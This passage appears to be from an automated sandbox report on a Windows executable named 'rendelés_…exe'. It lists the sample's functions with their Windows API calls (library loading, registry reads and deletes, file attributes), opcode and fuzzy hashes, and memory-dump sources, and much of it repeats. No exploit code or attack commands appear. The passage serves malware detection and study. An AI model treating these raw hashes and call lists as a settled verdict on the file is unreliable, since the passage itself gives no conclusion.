                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                                • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                                                                • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                                • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                                • Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
                                                                • Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                                • Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                                • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                                                                • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                                • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                                • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                                                                • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                                • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                                • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                                                                • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                                • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                                                                APIs
                                                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                                  • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                  • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                  • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8,004030A8,00422728,00000000,00000000,00000000), ref: 00405725
                                                                  • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                  • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                  • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                  • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                                • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                • String ID:
                                                                • API String ID: 334405425-0
                                                                • Opcode ID: 642719f50e8783f5edcee4fc1fc6b1094146a56febc3a31313945ed9f35360c6
                                                                • Instruction ID: 1e7e134340f86907485d462c64894228b35b3344cd4f3d252167f9901203d809
                                                                • Opcode Fuzzy Hash: 642719f50e8783f5edcee4fc1fc6b1094146a56febc3a31313945ed9f35360c6
                                                                • Instruction Fuzzy Hash: C521C231904104FADF11AFA5CF48A9D7A70BF48354F60413BF605B91E0DBBD8A929A5D
                                                                APIs
                                                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
                                                                • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E4
                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsm3A84.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: Enum$CloseValue
                                                                • String ID:
                                                                • API String ID: 397863658-0
                                                                • Opcode ID: a1dccb7ad5de8b03bade15b30a27ed1347f7b9d3a9e9f0d0aeacb5a18eef0a99
                                                                • Instruction ID: fdd171a53236be04b49e80cc8c25aaf428e2db1c32e81cf7e645575326a8d696
                                                                • Opcode Fuzzy Hash: a1dccb7ad5de8b03bade15b30a27ed1347f7b9d3a9e9f0d0aeacb5a18eef0a99
                                                                • Instruction Fuzzy Hash: 35017CB1A04105ABEB159F94DE58AAEB66CEF40348F10403AF501B61D0EBB85E45966D
                                                                APIs
                                                                • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,00422728,?,('B,00406563,('B,00000000,?,?,Call,?), ref: 004064F9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: Open
                                                                • String ID: ('B
                                                                • API String ID: 71445658-2332581011
                                                                • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                • Instruction ID: 5036765eb4ab6e58186d81024f5778724aa2024cd81e2e1d5ca813995cf5404a
                                                                • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                • Instruction Fuzzy Hash: BAD0123210020DBBDF115F90AD01FAB375DAB08310F018426FE06A4092D775D534A728
                                                                APIs
                                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsm3A84.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: CloseQueryValue
                                                                • String ID:
                                                                • API String ID: 3356406503-0
                                                                • Opcode ID: fe5d7100633d4aebe701fe4e2ff17594fa17b57cc0077f8e4dddba4eb7828dca
                                                                • Instruction ID: eaee0c709954dca67eb2d1c59e66f6ca2c08a593dad46a4828cc6951ae7b5872
                                                                • Opcode Fuzzy Hash: fe5d7100633d4aebe701fe4e2ff17594fa17b57cc0077f8e4dddba4eb7828dca
                                                                • Instruction Fuzzy Hash: 5C116D71900219EBDF14DFA4DE589AE7774FF04345B20443BE401B62D0E7B88A45EB5D
                                                                APIs
                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID:
                                                                • API String ID: 3850602802-0
                                                                • Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                                • Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
                                                                • Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                                • Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D
                                                                APIs
                                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 00402456
                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0040245F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: CloseDeleteValue
                                                                • String ID:
                                                                • API String ID: 2831762973-0
                                                                • Opcode ID: 65ff1f8dbaffb273fea002e1581b0fe02a96c3d403949f6d37ec42173edc1899
                                                                • Instruction ID: 27a137a867c600d8965633a271772258b7302ea9b92edfc7e4bdeed26dcbc29b
                                                                • Opcode Fuzzy Hash: 65ff1f8dbaffb273fea002e1581b0fe02a96c3d403949f6d37ec42173edc1899
                                                                • Instruction Fuzzy Hash: 54F06272A04120EBDB11ABB89B4DAAD72A9AF44354F15443BE141B71C0DAFC5D05866E
                                                                APIs
                                                                • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: Window$EnableShow
                                                                • String ID:
                                                                • API String ID: 1136574915-0
                                                                • Opcode ID: 153ab9e6739f7f886f4c830da5bbd0037cfdcbd629ab714a5d97d12cd43f86c5
                                                                • Instruction ID: 74d914ea4967392a65d1c9fdd8f91c6329c2dde8704c14122971abf6b6e16597
                                                                • Opcode Fuzzy Hash: 153ab9e6739f7f886f4c830da5bbd0037cfdcbd629ab714a5d97d12cd43f86c5
                                                                • Instruction Fuzzy Hash: 14E0D872908201CFE705EBA4EE485AD73F0EF40315710097FE401F11D0DBB54C00862D
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                                  • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                                  • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                                                                  • Part of subcall function 004069C5: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A2B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                • String ID:
                                                                • API String ID: 2547128583-0
                                                                • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                                • Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
                                                                • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                                • Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79
                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe,80000000,00000003), ref: 0040615C
                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: File$AttributesCreate
                                                                • String ID:
                                                                • API String ID: 415043291-0
                                                                • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                                • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                                                                • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                                • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 0040614C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
